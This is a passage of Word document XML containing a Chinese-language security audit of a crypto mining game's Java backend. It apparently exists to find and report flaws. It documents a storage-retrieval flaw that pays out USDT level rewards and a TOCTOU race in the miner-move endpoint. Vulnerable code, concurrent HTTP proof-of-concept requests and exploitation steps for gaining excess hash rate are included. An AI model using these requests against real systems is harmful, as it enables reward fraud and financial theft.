          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 将该矿机纳入算力计算，若矿机等级 &gt; 当前用户等级，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 触发，USDT 到账</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="525"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">重复步骤 3-6，依次使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>-2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>-3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、… 激活存放处所有高等级矿机，批量领取等级奖励和 USDT</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p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="526"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>账户 USDT 余额异常增加（对应被跨越等级的升级奖励之和）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="527"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>用户等级被推升至存放处最高等级矿机对应等级</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="528"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">同时获得 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>claimLevelReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 下发的全部等级奖励（金币/电力/矿机/加速卡）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="529"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>账户实际活跃矿机数量突破合法坑位上限（1-6），算力远超正常上限</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="530"/>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（需通过 TokenAuthFilter 校验，提供有效 Bearer Token；同时需通过 SignAuthTestFilter 签名校验）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="531"/>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普通用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，无需任何特殊权限；有存放处矿机的任意注册用户均可利用</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532"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.takeFromStorage → MinerService.java.takeFromStorage → MinerService.java.isSlotUnlocked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audit_m152_527_takeFromStorage_ctrl-path5of6.md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：MinerService.java#moveToSlot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_25" w:id="25"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞24：矿机移动接口坑位占用 TOCTOU 竞态条件 — 可突破坑位上限堆叠矿机</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="533"/>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：矿机移动坑位 TOCTOU 竞态 — 并发请求可将多台矿机叠放至同一坑位，绕过坑位容量限制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="534"/>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src/main/java/com/gameBack/mjservice/service/MinerService.java:moveToSlot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="535"/>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536"/>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537"/>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pBdr>
          <w:bottom w:val="single" w:color="dee0e3"/>
          <w:between w:val="single" w:color="dee0e3"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="538"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>漏洞描</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>moveToSlot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法在校验目标坑位是否为空（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>canPlaceInSlot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）与实际写入矿机新位置（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userMinerRepository.save</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）之间没有对目标坑位记录加锁，整个"检查→写入"序列不具备原子性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">在 MySQL/MariaDB 默认 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>READ COMMITTED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 事务隔离级别下，两个并发事务在各自执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>canPlaceInSlot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 时都能读到"目标坑位为空"的状态（互相的写入尚未提交），随后各自完成写入并提交，最终导致两台矿机同时位于同一坑位（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 相同，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage = 0</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利用这一竞态，攻击者每轮操作可将 2 台矿机"合并"至 1 个坑位，同时释放出原来占用的 2 个源坑位（净获得 1 个空坑位），然后再将仓库中的矿机填入释放的坑位，使系统中活跃矿机数超出坑位设计上限。由于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>computeBaseTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 无差别地对所有 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage = 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的矿机进行算力累加，叠放的矿机均被计入，最终用户获得超额算力，进而在后续周期结算时获取额外奖励收益。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="dee0e3"/>
          <w:between w:val="single" w:color="dee0e3"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="539"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>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/api/miner/move</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → TokenAuthFilter（验 Bearer Token，userId 可信）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → SignAuthTestFilter（验签，但两个并发请求各用不同 nonce 均可通过）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → MinerController.move()</w:t>
              <w:br/>
              <w:t xml:space="preserve">      → MinerService.moveToSlot()</w:t>
              <w:br/>
              <w:t xml:space="preserve">          ① canPlaceInSlot(userId, slotIdB)   ← 读时无锁，检查坑位为空</w:t>
              <w:br/>
              <w:t xml:space="preserve">          ② findByUserIdAndSlotIdAndInStorage(userId, slotIdA, 0) ← 读源矿机</w:t>
              <w:br/>
              <w:t xml:space="preserve">          ③ miner.setSlotId(slotIdB)           ← 写目标坑位（非原子）</w:t>
              <w:br/>
              <w:t xml:space="preserve">          ④ userMinerRepository.save(miner)    ← 提交写入</w:t>
              <w:br/>
              <w:t xml:space="preserve">          ⑤ recalcUserLevelAndHashRate(userId)</w:t>
              <w:br/>
              <w:t xml:space="preserve">              → computeBaseTotalHashRate(userId)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">                  findByUserIdAndInStorage(userId, 0)  ← 叠放矿机均在此被累加</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="dee0e3"/>
          <w:between w:val="single" w:color="dee0e3"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="540"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>❌ 存在漏洞的代码（完整调用链关键片段）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MoveMinerForm 可控字段：Integer slotIdA, Integer slotIdB</w:t>
              <w:br/>
              <w:t>@PostMapping("/move")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;UserMiner&gt; move(@CurrentUserId Long userId, @RequestBody MoveMinerForm form) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success(minerService.moveToSlot(userId, form.getSlotIdA(), form.getSlotIdB()));  // ← HTTP 可控入口</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 业务层：MinerService.java#moveToSlot</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public UserMiner moveToSlot(Long userId, Integer slotIdA, Integer slotIdB) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!canPlaceInSlot(userId, slotIdB)) {  // ← 读时无锁——并发线程均可通过此检查</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("目标坑位未解锁或已被占用");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ↑ T1 和 T2 并发时都能在此处读到 slotIdB 为空（对方未提交），均通过校验</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserMiner miner = userMinerRepository.findByUserIdAndSlotIdAndInStorage(userId, slotIdA, 0)  // ← T1 取 slot1 矿机，T2 取 slot2 矿机</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseThrow(() -&gt; new IllegalArgumentException("源坑位无矿机"));</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setSlotId(slotIdB);               // ← T1/T2 都将各自矿机 slotId 设为 slotIdB</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userMinerRepository.save(miner);        // ← 漏洞点：两次 save 均成功提交，slot3 出现两条记录</w:t>
              <w:br/>
              <w:t xml:space="preserve">    recalcUserLevelAndHashRate(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return miner;</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 坑位检查：MinerService.java#canPlaceInSlot（无悲观锁）</w:t>
              <w:br/>
              <w:t>public boolean canPlaceInSlot(Long userId, Integer slotId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!isSlotUnlocked(userId, slotId)) return false;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return userMinerRepository.findByUserIdAndSlotIdAndInStorage(userId, slotId, 0).isEmpty();  // ← 普通 SELECT，无 FOR UPDATE</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ④ 算力汇总：MinerService.java#computeBaseTotalHashRate</w:t>
              <w:br/>
              <w:t>public BigDecimal computeBaseTotalHashRate(Long userId) {</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    List&lt;UserMiner&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> miners = userMinerRepository.findByUserIdAndInStorage(userId, 0);  // ← 返回所有 inStorage=0 的矿机，含叠放的重复矿机</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return miners.stream()</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .map(m -&gt; { ... })</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .reduce(BigDecimal.ZERO, BigDecimal::add);  // ← 叠放矿机算力被重复累加</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numPr>
          <w:numId w:val="541"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>🔥 HTTP 请求包（POC）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>前提：用户已登录（拥有有效 Bearer Token），有 2 台矿机分别在坑位 1 和坑位 2，坑位 3 已解锁且为空。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>并发发送以下两个请求（需在同一时刻到达服务端，可用多线程/异步工具实现）：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/api/miner/move HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者合法Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce_1&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;sign_1&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"slotIdA": 1, "slotIdB": 3}</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/api/miner/move HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者合法Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce_2&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;sign_2&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"slotIdA": 2, "slotIdB": 3}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; 注意：两个请求使用不同的 nonce（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>nonce_1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ≠ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>nonce_2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）及对应的签名，可绕过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SignAuthTestFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的防重放 nonce 校验；两者各自持有合法签名，均能独立通过验签。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="dee0e3"/>
          <w:between w:val="single" w:color="dee0e3"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="542"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="543"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>准备阶段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：使用一个普通登录用户账号，确认：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="544"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>坑位 1 有矿机 A（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
